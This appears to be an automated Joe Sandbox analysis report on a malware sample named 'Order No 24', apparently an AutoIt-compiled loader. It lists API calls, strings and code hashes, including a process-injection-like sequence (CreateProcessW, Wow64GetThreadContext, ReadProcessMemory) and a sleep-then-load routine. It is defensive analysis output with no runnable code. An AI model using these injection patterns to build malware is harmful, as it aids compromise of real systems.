                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                  • Opcode ID: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                                                                                                                  • Instruction ID: 3aa7ca0d88b30a3918d958ea32edb10721836f2183fe868e50f96df9bff7aabb
                                                                                                                                  • Opcode Fuzzy Hash: 6b30b8d99341d8c4bf70f1f68e7113ac7e15e048c23d9ddffbbc0ebe65065008
                                                                                                                                  • Instruction Fuzzy Hash: 3DF0DA795802D47AE771D7D7AC48E672E7DD7C7F60B00001ABA04A21A0C56608D6DAB1

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1328 1273cc0-1273e41 call 1271910 call 1273bb0 CreateFileW 1335 1273e43 1328->1335 1336 1273e48-1273e58 1328->1336 1337 1273efb-1273f00 1335->1337 1339 1273e5f-1273e79 VirtualAlloc 1336->1339 1340 1273e5a 1336->1340 1341 1273e7d-1273e97 ReadFile 1339->1341 1342 1273e7b 1339->1342 1340->1337 1343 1273e9b-1273ed5 call 1273bf0 call 1272bb0 1341->1343 1344 1273e99 1341->1344 1342->1337 1349 1273ed7-1273eec call 1273c40 1343->1349 1350 1273ef1-1273ef9 ExitProcess 1343->1350 1344->1337 1349->1350 1350->1337
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 01273BB0: Sleep.KERNELBASE(000001F4), ref: 01273BC1
                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01273E34
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileSleep
                                                                                                                                  • String ID: OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4
                                                                                                                                  • API String ID: 2694422964-2689342645
                                                                                                                                  • Opcode ID: 8be565973a4962ba056013e4e258d85b9557097f70a89643597d65fd5bdb447e
                                                                                                                                  • Instruction ID: b8e83c1e9790ea0fec2a21c6f879da2ed81960b87f346d19f08a5918d9b74d62
                                                                                                                                  • Opcode Fuzzy Hash: 8be565973a4962ba056013e4e258d85b9557097f70a89643597d65fd5bdb447e
                                                                                                                                  • Instruction Fuzzy Hash: 2D718530D1428DDAEF11DBA4C855BEFBB75AF19304F004598E258BB2C1DBB90B49CB66
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0098522F
                                                                                                                                  • _wcscpy.LIBCMT ref: 00985283
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009F3CB0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                                  • String ID: Line:
                                                                                                                                  • API String ID: 1053898822-1585850449
                                                                                                                                  • Opcode ID: 5944d500b0ba4a67f30eef5175a998ba30cd9ad9cdf60e6f6547d96598343c12
                                                                                                                                  • Instruction ID: dcad910a549ab80e96f39e66d8c5ec94251e185a2e19f6e46cdf2bd579610c80
                                                                                                                                  • Opcode Fuzzy Hash: 5944d500b0ba4a67f30eef5175a998ba30cd9ad9cdf60e6f6547d96598343c12
                                                                                                                                  • Instruction Fuzzy Hash: 1B31CF75008740AFC325FBA0DC46FDA77D8AFC5310F00491EF59996291EB74A68DCB92
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                                                                                                                  • _free.LIBCMT ref: 009F36B7
                                                                                                                                  • _free.LIBCMT ref: 009F36FE
                                                                                                                                    • Part of subcall function 0098C833: __wsplitpath.LIBCMT ref: 0098C93E
                                                                                                                                    • Part of subcall function 0098C833: _wcscpy.LIBCMT ref: 0098C953
                                                                                                                                    • Part of subcall function 0098C833: _wcscat.LIBCMT ref: 0098C968
                                                                                                                                    • Part of subcall function 0098C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                  • API String ID: 805182592-1757145024
                                                                                                                                  • Opcode ID: 53ebd96c22a768aaab95373a52955fef70fa621846d65f03896af7af12dc0a66
                                                                                                                                  • Instruction ID: 55c1c02228c98b62f0b2484c6ac5e4d8a66a42930956cd957ef4a26f74abb6bb
                                                                                                                                  • Opcode Fuzzy Hash: 53ebd96c22a768aaab95373a52955fef70fa621846d65f03896af7af12dc0a66
                                                                                                                                  • Instruction Fuzzy Hash: 98913F71910219AFCF04EFA4CC92AFDB7B4BF59310F108429F916EB291DB349A55CB90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00985374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A41148,?,009861FF,?,00000000,00000001,00000000), ref: 00985392
                                                                                                                                    • Part of subcall function 009849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                                                                                                                  • _wcscat.LIBCMT ref: 009F2D80
                                                                                                                                  • _wcscat.LIBCMT ref: 009F2DB5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                  • String ID: \$\Include\
                                                                                                                                  • API String ID: 3592542968-2640467822
                                                                                                                                  • Opcode ID: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                                                                                                                  • Instruction ID: f281bdf6a44eaeafbc264ff997f52f722b64f862c92f2cc6b40ecb7219a7f2b7
                                                                                                                                  • Opcode Fuzzy Hash: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                                                                                                                  • Instruction Fuzzy Hash: ED51657D4043409FC714EFA9D981BAAB7F8FFDA300B804A2EF64597261EB319549CB51
                                                                                                                                  APIs
                                                                                                                                  • __getstream.LIBCMT ref: 009A34FE
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 009A3539
                                                                                                                                  • __wopenfile.LIBCMT ref: 009A3549
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                  • String ID: <G
                                                                                                                                  • API String ID: 1820251861-2138716496
                                                                                                                                  • Opcode ID: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                                                                                                                  • Instruction ID: 82a7b5bd6e3cea00c3dcde19f71b789cf3b4dc9c3a0f3bbfba624219139fdf9b
                                                                                                                                  • Opcode Fuzzy Hash: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                                                                                                                  • Instruction Fuzzy Hash: 0C11A770A00306ABDB11BFB49C4276E76F8AF8B350B15C925F419D7291EB34CA1197E1
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0099D28B,SwapMouseButtons,00000004,?), ref: 0099D2BC
                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2DD
                                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2FF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                  • Opcode ID: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                                                                                                                  • Instruction ID: 54fe7f0a92269ec6b2e916f8c84bb62bd19061c085bfb641242e799af7f48351
                                                                                                                                  • Opcode Fuzzy Hash: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                                                                                                                  • Instruction Fuzzy Hash: 32113976612209BFDF208FA8CC85EAF7BBCEF54745F104869E806D7110E631AE429B60
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0127336B
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01273401
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01273423
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                  • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                                                                                                  • Instruction ID: eccee1302969c92f824d89a455b8cd6ded0c705dff51b3adbe2e318e842230d5
                                                                                                                                  • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                                                                                                  • Instruction Fuzzy Hash: EB621B70A24259DAEB24CFA4C851BDEB371FF58300F1091A9D20DEB394E7759E81CB59
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
                                                                                                                                    • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
                                                                                                                                    • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
                                                                                                                                  • _free.LIBCMT ref: 009CC4DD
                                                                                                                                  • _free.LIBCMT ref: 009CC4E4
                                                                                                                                  • _free.LIBCMT ref: 009CC54F
                                                                                                                                    • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                                                                                                                    • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                                                                                                                  • _free.LIBCMT ref: 009CC557
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                  • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                                                                  • Instruction ID: bd44cbeff4031a48c0e3a6762d54e4d1a61b9199559fa50fe3c2d89635e1149b
                                                                                                                                  • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                                                                  • Instruction Fuzzy Hash: 68514EB1E04219AFDB149F64DC81BADBBB9EF48310F1044AEF25DA3251DB715A808F59
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0099EBB2
                                                                                                                                    • Part of subcall function 009851AF: _memset.LIBCMT ref: 0098522F
                                                                                                                                    • Part of subcall function 009851AF: _wcscpy.LIBCMT ref: 00985283
                                                                                                                                    • Part of subcall function 009851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0099EC07
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0099EC16
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009F3C88
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                  • Opcode ID: 211f93f6eb73993e9ce32dab5cf50185aa7187615ced1cdb207bd282a7e3fd47
                                                                                                                                  • Instruction ID: 7f5c63486e760215467db79599eeb38bbb3ec6f9f0477dad00ce846e71f802d7
                                                                                                                                  • Opcode Fuzzy Hash: 211f93f6eb73993e9ce32dab5cf50185aa7187615ced1cdb207bd282a7e3fd47
                                                                                                                                  • Instruction Fuzzy Hash: AD21D7759047889FEB32DB68C859BF7BFEC9B41308F04048DE6DE56282D3786A858B51
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009F3725
                                                                                                                                  • GetOpenFileNameW.COMDLG32 ref: 009F376F
                                                                                                                                    • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                                                                                                                    • Part of subcall function 009840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 3777226403-3081909835
                                                                                                                                  • Opcode ID: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                                                                                                                  • Instruction ID: 8320e39998196686aa3b36b395c024da4e2592e46d88db5bbcb4e9f00459de10
                                                                                                                                  • Opcode Fuzzy Hash: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                                                                                                                  • Instruction Fuzzy Hash: 0E21A871A141989FCF01EFD4C845BEE7BF89F99304F008059E505EB341DBB85A898F65
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 009CC72F
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009CC746
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                  • String ID: aut
                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                  • Opcode ID: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                                                                                                                  • Instruction ID: 1acf0c4767ea78bc6ff420d7d7862763af22229bfd70b47af1f567cef363188b
                                                                                                                                  • Opcode Fuzzy Hash: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                                                                                                                  • Instruction Fuzzy Hash: 20D05E7250030EBBDB10EBE0DC0EFCA776CA704704F0005A07750A50B1DAB4E69B8B54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                                                                                                                  • Instruction ID: 00b13ac2e8c232cfa6b9c9afcfdcdc129a0d9cc9d1be226837d3d5837a348adf
                                                                                                                                  • Opcode Fuzzy Hash: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                                                                                                                  • Instruction Fuzzy Hash: 1CF16A716043419FCB10DF28C891B6AB7E5BFC8314F14896EF99A9B392D734E945CB82
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00985022
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell__memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 928536360-0
                                                                                                                                  • Opcode ID: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                                                                                                                  • Instruction ID: d345d2fccc6737b0e2dd772a8c21811a156b9ab505a27fb70a6974333f30d9c4
                                                                                                                                  • Opcode Fuzzy Hash: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                                                                                                                  • Instruction Fuzzy Hash: 9E3161B5504701CFD721EF68D845697BBE8FF89304F00092EE69E87351E772A989CB92
                                                                                                                                  APIs
                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 009A3973
                                                                                                                                    • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81E9
                                                                                                                                    • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81F3
                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 009A397A
                                                                                                                                    • Part of subcall function 009A821F: GetModuleFileNameW.KERNEL32(00000000,00A40312,00000104,00000000,00000001,00000000), ref: 009A82B1
                                                                                                                                    • Part of subcall function 009A821F: ___crtMessageBoxW.LIBCMT ref: 009A835F
                                                                                                                                    • Part of subcall function 009A1145: ___crtCorExitProcess.LIBCMT ref: 009A114B
                                                                                                                                    • Part of subcall function 009A1145: ExitProcess.KERNEL32 ref: 009A1154
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                  • Opcode ID: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                                                                                                                  • Instruction ID: f1066e868426c7ff09647d279b4cc672865869225fafa7ce99020550e8a9086d
                                                                                                                                  • Opcode Fuzzy Hash: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                                                                                                                  • Instruction Fuzzy Hash: D301B536345301DAE6217BB8EC46B6B739C9FC3764F218125F6059B392DFB49D0186E0
                                                                                                                                  APIs
